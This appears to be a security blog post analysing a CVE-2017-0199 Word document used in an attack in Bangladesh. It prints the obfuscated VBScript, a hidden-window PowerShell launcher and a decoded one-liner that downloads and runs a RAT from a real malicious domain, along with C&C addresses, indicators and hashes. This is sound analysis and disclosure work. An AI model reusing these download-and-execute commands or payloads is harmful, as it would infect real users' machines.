APT attack in Bangladesh


Deprecated: str_replace(): Passing null to parameter #3 ($subject) of type array|string is deprecated in /var/www/wptbox/wp-includes/script-loader.php on line 2901

One of my friends from Bangladesh @rudr4_sarkar sent me this link to analyze which leads to a Word document.
http://mozillatm.com/A0Jst6jAd7CYerrqFmwb4wqDLa5XHPW_May_2017.doc

VirusTotal: https://virustotal.com/en/file/273b0fc627daefd0fbae209e5fa1ea619bfb177a1b0ae2d55a606cf2c6ec2674/analysis/1496541543/

I figured out that this was the CVE-2017-0199 exploit. It was simple to find the payload.

[code language=”python”]
b = ‘00000068007400740070003a002f002f006d006f007a0069006c006c00610074006d002e0063006f006d002f006c006f006100640069006e0067002e00680074006d006c00000000′

"".join("{0}".format((i+j).replace(’00’,”).decode(‘hex’)) for i, j in zip(b[::2], b[1::2]))

>> ‘http://mozillatm.com/loading.html’
[/code]

This exploit will deliver a malicious HTA file and execute it. HTA means IE, so yeah VBScript will execute nicely.

Once we visit this page we can see the obfuscated VBScript which will execute PowerShell and drop the malware on the system.

You can view the source from here: https://pastebin.com/kt3LNwiw
This part of the code seems to be interesting.

[code language=”vb”]
fuNctioN gJSoYXXAVqwD()

DIM taCXnLuJDFFL

taCXnLuJDFFL = cHRW(34)
CReaTEoBJecT(HLJlzxWsFMxQ(CGUgZBJuvRsW("V1RzVENUUlRJVHBUVFQuVHNUaFRlVExUTFQ="))).expANdEnVIRoNMEnTSTrInGS(HLJlzxWsFMxQ(CGUgZBJuvRsW("JVpzWnlac1p0WmVaTVpSWm9ab1pUWiVa")))
HLJlzxWsFMxQ(CGUgZBJuvRsW("XGtTa3lrU2tUa0VrTWszazJrXGtXa2lrTmtEa29rV2tTa3Brb2tXa0Vrcmtza0hrRWtMa0xrXGt2azFrLmswa1xrcGtva3drZWtSa3NraGtFa0xrTGsua2VreGtFaw=="))
ChRw(34)

CreAtEOBJeCt(HLJlzxWsFMxQ(CGUgZBJuvRsW("d0FzQWNBckFJQXBBdEEuQXNBaEFFQWxBbEE="))).run taCXnLuJDFFL
" POwerShELL.exe -EXECUtIOnPOlIcY BYPaSS -noPROfiLE -WInDoWStYlE HiDDen -EnCOdedCommAnD IAAoAG4ARQB3AC0AbwBCAEoARQBDAHQAIABTAHkAcwBUAEUATQAuAE4AZQBUAC4AVwBlAGIAYwBMAGkAZQBOAFQAKQAuAEQAbwB3AG4ATABPAEEARABGAGkATABFACgAIAAdIGgAdAB0AHAAOgAvAC8AbQBvAHoAaQBsAGwAYQB0AG0ALgBjAG8AbQAvAGwAbwBhAGQAaQBuAGcALgBlAHgAZQAdICAALAAgAB0gJABFAG4AdgA6AFQATQBQAFwAQwBoAHIAbwBtAGUAdABtAC4AZQB4AGUAHSAgACkAIAA7ACAAcwBUAEEAcgBUACAAHSAkAEUAbgB2ADoAdABNAFAAXABDAGgAcgBvAG0AZQB0AG0ALgBlAHgAZQAdIA== " , 0

eND fUnCtioN
[/code]

However keep the obfuscated code aside, if we debug the code, finally the “taCXnLuJDFFL” variable will contain
[code language=”text”]
""C:\Windows\SySTEM32\WiNDoWSpoWErsHELL\v1.0\poweRshELL.exE""
[/code]

We could write pseudo code like this.

[code language=”vb”]
Set oShell = WScript.CreateObject ("WSCript.shell")
oShell.run ""C:\Windows\SySTEM32\WiNDoWSpoWErsHELL\v1.0\poweRshELL.exE"" & " POwerShELL.exe -EXECUtIOnPOlIcY BYPaSS -noPROfiLE -WInDoWStYlE HiDDen -EnCOdedCommAnD IAAoAG4ARQB3AC0AbwBCAEoARQBDAHQAIABTAHkAcwBUAEUATQAuAE4AZQBUAC4AVwBlAGIAYwBMAGkAZQBOAFQAKQAuAEQAbwB3AG4ATABPAEEARABGAGkATABFACgAIAAdIGgAdAB0AHAAOgAvAC8AbQBvAHoAaQBsAGwAYQB0AG0ALgBjAG8AbQAvAGwAbwBhAGQAaQBuAGcALgBlAHgAZQAdICAALAAgAB0gJABFAG4AdgA6AFQATQBQAFwAQwBoAHIAbwBtAGUAdABtAC4AZQB4AGUAHSAgACkAIAA7ACAAcwBUAEEAcgBUACAAHSAkAEUAbgB2ADoAdABNAFAAXABDAGgAcgBvAG0AZQB0AG0ALgBlAHgAZQAdIA== " , 0
[/code]

Once we decode the encoded command supplied to powershell we can see the malware being downloaded.
[code language=”powershell”]
$EncodedText = "IAAoAG4ARQB3AC0AbwBCAEoARQBDAHQAIABTAHkAcwBUAEUATQAuAE4AZQBUAC4AVwBlAGIAYwBMAGkAZQBOAFQAKQAuAEQAbwB3AG4ATABPAEEARABGAGkATABFACgAIAAdIGgAdAB0AHAAOgAvAC8AbQBvAHoAaQBsAGwAYQB0AG0ALgBjAG8AbQAvAGwAbwBhAGQAaQBuAGcALgBlAHgAZQAdICAALAAgAB0gJABFAG4AdgA6AFQATQBQAFwAQwBoAHIAbwBtAGUAdABtAC4AZQB4AGUAHSAgACkAIAA7ACAAcwBUAEEAcgBUACAAHSAkAEUAbgB2ADoAdABNAFAAXABDAGgAcgBvAG0AZQB0AG0ALgBlAHgAZQAdIA=="
$DecodedText = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($EncodedText))
Write-Host $DecodedText
[/code]

This is a PowerShell one-liner to drop the malware from http://mozillatm.com/loading.exe and save it to the %TMP% folder as “Chrometm.exe”

[code language=”powershell”]
(nEw-oBJECt SysTEM.NeT.WebcLieNT).DownLOADFiLE( ”http://mozillatm.com/loading.exe” , ”$Env:TMP\Chrometm.exe” ) ; sTArT ”$Env:tMP\Chrometm.exe”
[/code]

This malware is written in Visual Basic and highly obfuscated. I submitted this sample to Malwr.com and you can view the complete analysis here. Seems like the attackers are using Luminosity RAT.

https://malwr.com/analysis/YmJiNTEwYzE5OWFkNDZjYmFiNTY0OWZhMzA5YzgyOGY/

After running it will copy itself inside the “program files” folder as “Mozillatm.exe”. We can check the autorun entries. There’s another exe as “Mozillatms.exe” inside the “system32” folder, notice the ‘s’. It seemed to be a backup.

The copy inside “Program Files”.

However, I noticed something, in 64-bit machines the malware will copy itself into the “C:\windows\SysWow64” folder. So this autorun key won’t work under 64-bit machines, meaning the backup malware will fail under 64-bit.

“Mozillatm.exe” will be our malicious executable running.

This malware will communicate with the C&C, IP address is 162.248.92.28:131106

This malware will store screenshots, keystroke logs and send them to the C&C server. They are located inside %USERPROFILE%\AppData\Roaming\Mozillatms

Keystroke logs can be found inside the “logs” folder.

The screenshot data is compressed using the deflate algorithm. This happens when you compress twice. But however can be decompressed easily.

I wrote a simple tool to perform compression and decompression using the deflate algorithm.

[code language=”text”]
Deflate.exe “6.51 PM” output.jpg -d
[/code]


View this gist on GitHub

This is an example screenshot taken by the malware.

For curiosity I had a look around the C&C IP address 162.248.92.28 and found out using Squid proxy.

However, it uses HTTP authentication.

With a bit of Googling, I found out that these domains too are variants of this attack using the same malware.

  • Bd2bd.com
  • Pc-net.org
  • Bd-pc.com
  • Registerbd.com

You can find more details by beetles.io on http://blog.beetles.io/2017/05/29/apt-rat-1/ and https://blog.beetles.io/2017/06/01/operation-brightroar-uncovering-more-attack-pattern/

The samples I’ve analyzed.

Filename: loading.exe
SHA256: 9865ccfe4dd0c893c88d24168425933e5663ee8861a3b360e1b10e63769f5392
https://virustotal.com/en/file/9865ccfe4dd0c893c88d24168425933e5663ee8861a3b360e1b10e63769f5392/analysis/1496541573/
https://malwr.com/analysis/YmJiNTEwYzE5OWFkNDZjYmFiNTY0OWZhMzA5YzgyOGY/

Filename: A0Jst6jAd7CYerrqFmwb4wqDLa5XHPW_May_2017.doc
SHA256: 273b0fc627daefd0fbae209e5fa1ea619bfb177a1b0ae2d55a606cf2c6ec2674
https://virustotal.com/en/file/273b0fc627daefd0fbae209e5fa1ea619bfb177a1b0ae2d55a606cf2c6ec2674/analysis/1496541543/

5 thoughts on “APT attack in Bangladesh

  1. Good article Malith. The malware has added itself in the task and queries to 192.168.0.142? Any thought on this?

Leave a Reply